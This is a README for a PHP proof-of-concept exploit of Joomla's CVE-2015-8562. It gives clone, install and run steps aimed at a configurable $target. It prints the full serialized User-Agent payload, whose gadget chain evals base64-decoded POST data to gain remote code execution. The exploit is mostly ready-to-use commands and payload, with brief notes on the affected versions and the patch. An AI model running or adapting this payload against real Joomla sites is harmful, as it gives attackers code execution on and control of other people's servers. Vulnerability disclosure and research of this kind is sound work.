A proof of concept for Joomla's CVE-2015-8562 vulnerability

This PoC is a near 1:1 copy of Gary's python implementation hosted at exploit-db.

It's very easy to install:

git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install

Once composer has everything installed you'll need to change $target in exploit.php.

After that you're ready to go:

php exploit.php

In December 2015 a vulnerability was found in Joomla. It allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header.

This vulnerability hit all versions of Joomla. A patch for v1.5.x, v2.5x and v3.x is already released.

If you are running PHP >= 5.4.45, >= 5.5.29 or >= 5.6.13 you are fine as this exploit also utilises CVE-2015-6835.

Nikos Verschore from PatrolServer made a very detailed blog post and was a major help at understanding this vulnerability. You can use their mini-scanner for free to check if your site is at risk.

This is what the sent User-Agent header looks like:

jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
  s:4:"\0\0\0a";
  O:17:"JSimplepieFactory":0:{}
  s:21:"\0\0\0disconnectHandlers";
  a:1:{
    i:0;
    a:2:{
      i:0;
      O:9:"SimplePie":5:{
        s:8:"sanitize";
        O:20:"JDatabaseDriverMysql":0:{}
        s:5:"cache";
        b:1;
        s:19:"cache_name_function";
        s:6:"assert";
        s:10:"javascript";
        i:9999;
        s:8:"feed_url";
        s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
      }
      i:1;
      s:4:"init";
    }
  }
  s:13:"\0\0\0connection";
  i:1;
}